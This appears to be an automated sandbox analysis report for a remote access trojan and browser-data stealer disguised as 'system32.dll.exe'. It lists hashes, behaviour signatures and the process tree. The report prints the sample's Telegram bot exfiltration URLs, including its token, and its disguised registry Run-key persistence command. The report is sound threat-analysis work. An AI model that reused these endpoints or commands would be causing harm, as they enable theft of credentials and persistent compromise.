Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
51s -
max time network
53s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/12/2024, 04:57
Static task
static1
Behavioral task
behavioral1
Sample
system32.dll.exe
Resource
win10v2004-20241007-en
General
-
Target
system32.dll.exe
-
Size
11.7MB
-
MD5
61436a5727d36c7e874181a08ae69b2e
-
SHA1
a8622ec1b7bf5fd040bc1768133c8ee2c8e79acc
-
SHA256
251d4a1307fb42d38c24b58f534a06906d0a89ef6f11daf625d9e2feaccb5ca5
-
SHA512
ca4072766b860ac8216ecbd905b25139ad8ef7ac3222e0ca99ef38d39cc4a6b96e43a77a5d11f2b3fc21723bbdf79931fe5417864c43ad2a2a2286a89a1a1b3c
-
SSDEEP
196608:bgjFnMsTXsvnox3g6W+QRO+KU8oTtoS3darE/W5FfUF/Z0RUSDBD9DsyKJbtYxn:UxnMsTXsvoRgX+joZB7+fk/rkBebSn
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8137934554:AAFOeSb9oJjQx7sEfNVTiItYJefxeHOSueA/sendDocument?chat_id=-4683258951&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8137934554:AAFOeSb9oJjQx7sEfNVTiItYJefxeHOSueA/sendMessage?chat_id=-4683258951
https://api.telegram.org/bot8137934554:AAFOeSb9oJjQx7sEfNVTiItYJefxeHOSueA/getUpdates?offset=-
https://api.telegram.org/bot8137934554:AAFOeSb9oJjQx7sEfNVTiItYJefxeHOSueA/sendDocument?chat_id=-4683258951&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation kernal32.dll.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation system32.dll.exe -
Executes dropped EXE 4 IoCs
pid Process 4408 kernal32.dll.exe 3524 system32.dll.exe 4412 Update.exe 4872 tempdatalogger.exe -
Loads dropped DLL 4 IoCs
pid Process 4408 kernal32.dll.exe 3524 system32.dll.exe 4412 Update.exe 4872 tempdatalogger.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 40 raw.githubusercontent.com 41 raw.githubusercontent.com 44 raw.githubusercontent.com 48 raw.githubusercontent.com 55 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 ip-api.com -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3940 tasklist.exe 3220 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 876 set thread context of 3976 876 system32.dll.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system32.dll.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4444 timeout.exe 772 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3272 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 876 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 3524 system32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4408 kernal32.dll.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe 4412 Update.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 876 system32.dll.exe Token: SeDebugPrivilege 4408 kernal32.dll.exe Token: SeDebugPrivilege 3524 system32.dll.exe Token: SeDebugPrivilege 3940 tasklist.exe Token: SeDebugPrivilege 4412 Update.exe Token: SeDebugPrivilege 3220 tasklist.exe Token: SeDebugPrivilege 4872 tempdatalogger.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4412 Update.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 876 wrote to memory of 184 876 system32.dll.exe 100 PID 876 wrote to memory of 184 876 system32.dll.exe 100 PID 876 wrote to memory of 184 876 system32.dll.exe 100 PID 876 wrote to memory of 952 876 system32.dll.exe 101 PID 876 wrote to memory of 952 876 system32.dll.exe 101 PID 876 wrote to memory of 952 876 system32.dll.exe 101 PID 876 wrote to memory of 1404 876 system32.dll.exe 102 PID 876 wrote to memory of 1404 876 system32.dll.exe 102 PID 876 wrote to memory of 1404 876 system32.dll.exe 102 PID 876 wrote to memory of 4652 876 system32.dll.exe 103 PID 876 wrote to memory of 4652 876 system32.dll.exe 103 PID 876 wrote to memory of 4652 876 system32.dll.exe 103 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 876 wrote to memory of 3976 876 system32.dll.exe 104 PID 3976 wrote to memory of 4408 3976 RegAsm.exe 105 PID 3976 wrote to memory of 4408 3976 RegAsm.exe 105 PID 3976 wrote to memory of 3524 3976 RegAsm.exe 106 PID 3976 wrote to memory of 3524 3976 RegAsm.exe 106 PID 4408 wrote to memory of 2804 4408 kernal32.dll.exe 109 PID 4408 wrote to memory of 2804 4408 kernal32.dll.exe 109 PID 2804 wrote to memory of 4288 2804 cmd.exe 111 PID 2804 wrote to memory of 4288 2804 cmd.exe 111 PID 2804 wrote to memory of 3940 2804 cmd.exe 112 PID 2804 wrote to memory of 3940 2804 cmd.exe 112 PID 2804 wrote to memory of 2156 2804 cmd.exe 113 PID 2804 wrote to memory of 2156 2804 cmd.exe 113 PID 2804 wrote to memory of 4444 2804 cmd.exe 114 PID 2804 wrote to memory of 4444 2804 cmd.exe 114 PID 2804 wrote to memory of 4412 2804 cmd.exe 115 PID 2804 wrote to memory of 4412 2804 cmd.exe 115 PID 4412 wrote to memory of 4536 4412 Update.exe 117 PID 4412 wrote to memory of 4536 4412 Update.exe 117 PID 4536 wrote to memory of 3272 4536 cmd.exe 119 PID 4536 wrote to memory of 3272 4536 cmd.exe 119 PID 3524 wrote to memory of 3932 3524 system32.dll.exe 120 PID 3524 wrote to memory of 3932 3524 system32.dll.exe 120 PID 3932 wrote to memory of 4552 3932 cmd.exe 122 PID 3932 wrote to memory of 4552 3932 cmd.exe 122 PID 3932 wrote to memory of 3220 3932 cmd.exe 123 PID 3932 wrote to memory of 3220 3932 cmd.exe 123 PID 3932 wrote to memory of 3828 3932 cmd.exe 124 PID 3932 wrote to memory of 3828 3932 cmd.exe 124 PID 3932 wrote to memory of 772 3932 cmd.exe 125 PID 3932 wrote to memory of 772 3932 cmd.exe 125 PID 3932 wrote to memory of 4872 3932 cmd.exe 126 PID 3932 wrote to memory of 4872 3932 cmd.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\system32.dll.exe"C:\Users\Admin\AppData\Local\Temp\system32.dll.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:184
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:952
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:1404
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:4652
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Users\Admin\AppData\Roaming\kernal32.dll.exe"C:\Users\Admin\AppData\Roaming\kernal32.dll.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4A62.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4A62.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4288
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4408"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:2156
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:4444
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f6⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:3272
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\system32.dll.exe"C:\Users\Admin\AppData\Roaming\system32.dll.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp75E7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp75E7.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4552
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 3524"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:3828
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:772
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
286B
MD51262ee456b0316c775fca7312251e84e
SHA1ab85058ca0df84c872fa09221edac087af3adbc2
SHA256dfd188e394ad5002d1efbd7be3aef7f5854632fcf1ea6970352820cc48865229
SHA51227fe1cec7dcbc415eb07debeed58841b723c8971e1d9259feb2f11c6ad4238b0cf8da12c8ab4a8701f1e9fd4836f5af51c1363f731e82c5b19205c1b6f46fc92
-
Filesize
278B
MD5aa2a36d2d9a1e37b0ec1fe95e5344f7b
SHA12fa2891b4627760de84cb6a7ff7d1be4e6fc69b7
SHA25625899b34cb52a75771375d36f4d4ad3fb1e671a7d4325684ccaaec19cf188d5c
SHA512e692c6ee92ddeed0df648ceef212344a1ec4fdfed37888b51f7847303979b8e611da0db25ea68e800541da5366164f024f54ed965c39a29b164acf0ad34207ae
-
Filesize
5.7MB
MD506adcba87d10b2bf6aadb6b69436ab88
SHA115e3899cff111bc86adeead73c9fc7617f05cb25
SHA256221bf1dea0a3e29ffedf041d23c2474ffeeb1747f92538f441b233991081695e
SHA5122b95db05c649c24d33b0245123972dec916d3c4b3ea96496efb9094e973f21aa0a10b65ccf20b560a01b3c7ee3ceb847b20be1ee9cfaf3243e215fa1e7bf4848
-
Filesize
5.6MB
MD53cac99a9fb1e1997d18689fa733a726d
SHA1139f552b75cfa3e1a7c8ca60a636ada71a670271
SHA256408884985b428d90e09f09945edaf23321bf5295faf611a99e67e983c28fbd20
SHA512998f370fb743cc87fb5d381a709f11e13cc7a7d94428bbd649cbd4f7a8bf3a26f4fb333e575e360a7863fce148ae3f7fb66cf3d0604e743a8643c1c7c7ff63ab